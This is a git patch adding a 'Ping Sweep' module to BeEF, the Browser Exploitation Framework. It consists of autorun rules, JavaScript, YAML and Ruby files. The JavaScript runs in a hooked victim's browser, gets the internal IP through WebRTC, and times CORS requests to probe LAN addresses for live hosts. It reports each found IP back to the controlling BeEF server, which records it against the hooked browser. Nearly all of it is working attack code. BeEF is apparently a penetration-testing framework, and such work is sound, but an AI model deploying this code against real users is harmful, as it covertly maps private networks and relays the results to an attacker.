From 624d81749ed8eb9b612a7d08dffd86db9103d3db Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Sun, 17 Apr 2016 14:07:55 +0000 Subject: [PATCH] Add Ping Sweep module --- arerules/lan_ping_sweep.json | 25 ++++++ arerules/lan_ping_sweep_common.json | 20 +++++ modules/network/ping_sweep/command.js | 108 +++++++++++++++++++++++++ modules/network/ping_sweep/config.yaml | 16 ++++ modules/network/ping_sweep/module.rb | 38 +++++++++ 5 files changed, 207 insertions(+) create mode 100644 arerules/lan_ping_sweep.json create mode 100644 arerules/lan_ping_sweep_common.json create mode 100644 modules/network/ping_sweep/command.js create mode 100644 modules/network/ping_sweep/config.yaml create mode 100644 modules/network/ping_sweep/module.rb diff --git a/arerules/lan_ping_sweep.json b/arerules/lan_ping_sweep.json new file mode 100644 index 000000000..a89ce7def --- /dev/null +++ b/arerules/lan_ping_sweep.json @@ -0,0 +1,25 @@ +{"name": "LAN Ping Sweep", + "author": "bcoles", + "browser": "FF", + "browser_version": "ALL", + "os": "ALL", + "os_version": "ALL", + "modules": [ + {"name": "get_internal_ip_webrtc", + "condition": null, + "code": null, + "options": {} + }, + {"name": "ping_sweep", + "condition": "status==1", + "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.1'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.255'; var mod_input = start+'-'+end;", + "options": { + "rhosts":"<>", + "threads":"3" + } + } + ], + "execution_order": [0, 1], + "execution_delay": [0, 0], + "chain_mode": "nested-forward" +} diff --git a/arerules/lan_ping_sweep_common.json b/arerules/lan_ping_sweep_common.json new file mode 100644 index 000000000..3702ecbb7 --- /dev/null +++ b/arerules/lan_ping_sweep_common.json @@ -0,0 +1,20 @@ +{"name": "LAN Ping Sweep (Common IPs)", + "author": "bcoles", + "browser": "FF", + "browser_version": "ALL", + "os": "ALL", + "os_version": "ALL", + "modules": [ + {"name": "ping_sweep", + "condition": null, + "code": null, + "options": { + "rhosts":"common", + "threads":"3" + } + } + ], + "execution_order": [0], + "execution_delay": [0], + "chain_mode": "sequential" +} diff --git a/modules/network/ping_sweep/command.js b/modules/network/ping_sweep/command.js new file mode 100644 index 000000000..78cea7726 --- /dev/null +++ b/modules/network/ping_sweep/command.js @@ -0,0 +1,108 @@ +// +// Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var ips = new Array(); + var rhosts = "<%= @rhosts %>"; + var threads = parseInt("<%= @threads %>", 10) || 3; + var timeout = 1000; + + if(!beef.browser.hasCors()) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Browser does not support CORS', beef.are.status_error()); + return; + } + + // set target IP addresses + if (rhosts == 'common') { + // use default IPs + ips = [ + '192.168.0.1', + '192.168.0.100', + '192.168.0.254', + '192.168.1.1', + '192.168.1.100', + '192.168.1.254', + '10.0.0.1', + '10.1.1.1', + '192.168.2.1', + '192.168.2.254', + '192.168.100.1', + '192.168.100.254', + '192.168.123.1', + '192.168.123.254', + '192.168.10.1', + '192.168.10.254' + ]; + } else { + // set target IP range + var range = rhosts.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$'); + if (range == null || range[1] == null) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied", beef.are.status_error()); + return; + } + ipBounds = rhosts.split('-'); + lowerBound = ipBounds[0].split('.')[3]; + upperBound = ipBounds[1].split('.')[3]; + for (var i = lowerBound; i <= upperBound; i++){ + ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i; + ips.push(ipToTest); + } + } + + WorkerQueue = function(frequency) { + + var stack = []; + var timer = null; + var frequency = frequency; + var start_scan = (new Date).getTime(); + + this.process = function() { + var item = stack.shift(); + eval(item); + if (stack.length === 0) { + clearInterval(timer); + timer = null; + var interval = (new Date).getTime() - start_scan; + beef.debug("[Ping Sweep] Worker queue is complete ["+interval+" ms]"); + return; + } + } + + this.queue = function(item) { + stack.push(item); + if (timer === null) timer = setInterval(this.process, frequency); + } + + } + + // create workers + var workers = new Array(); + for (w=0; w < threads; w++) workers.push(new WorkerQueue(timeout)); + + beef.debug("[Ping Sweep] Starting scan ("+(ips.length)+" URLs / "+threads+" workers)"); + for (var i=0; i < ips.length; i++) { + var worker = workers[i % threads]; + var ip = ips[i]; + // use a high port likely to be closed/filtered (60000 - 65000) + var port = Math.floor(Math.random() * 5000) + 60000; + worker.queue('var start_time = new Date().getTime();' + + 'beef.net.cors.request(' + + '"GET", "http://'+ip+':'+port+'/", "", '+timeout+', function(response) {' + + 'var current_time = new Date().getTime();' + + 'var duration = current_time - start_time;' + + 'if (duration < '+timeout+') {' + + 'beef.debug("[Ping Sweep] '+ip+' [" + duration + " ms] -- host is up");' + + 'beef.net.send("<%= @command_url %>", <%= @command_id %>, "ip='+ip+'&ping="+duration+"ms", beef.are.status_success());' + + '} else {' + + 'beef.debug("[Ping Sweep] '+ip+' [" + duration + " ms] -- timeout");' + + '}' + + '});' + ); + } + +}); + diff --git a/modules/network/ping_sweep/config.yaml b/modules/network/ping_sweep/config.yaml new file mode 100644 index 000000000..e3613f8fb --- /dev/null +++ b/modules/network/ping_sweep/config.yaml @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + ping_sweep: + enable: true + category: "Network" + name: "Ping Sweep" + description: "Discover active hosts in the internal network of the hooked browser using JavaScript XHR.

Note: set the IP address range to 'common' to scan a list of common LAN addresses." + authors: ["bcoles"] + target: + working: ["FF"] + not_working: ["ALL"] diff --git a/modules/network/ping_sweep/module.rb b/modules/network/ping_sweep/module.rb new file mode 100644 index 000000000..d2a26ed1d --- /dev/null +++ b/modules/network/ping_sweep/module.rb @@ -0,0 +1,38 @@ +# +# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Ping_sweep < BeEF::Core::Command + + def post_execute + content = {} + content['result'] = @datastore['result'] + save content + + configuration = BeEF::Core::Configuration.instance + if configuration.get("beef.extension.network.enable") == true + + session_id = @datastore['beefhook'] + + # log the network service + if @datastore['results'] =~ /^ip=(.+)&ping=(\d+)ms$/ + ip = $1 + ping = $2 + if BeEF::Filters.is_valid_ip?(ip) + print_debug("Hooked browser found host #{ip}") + BeEF::Core::Models::NetworkHost.add(:hooked_browser_id => session_id, :ip => ip) + end + end + end + + end + + def self.options + return [ + {'name' => 'rhosts', 'ui_label' => 'Scan IP range (C class)', 'value' => 'common' }, + {'name' => 'threads', 'ui_label' => 'Workers', 'value' => '3'} + ] + end + +end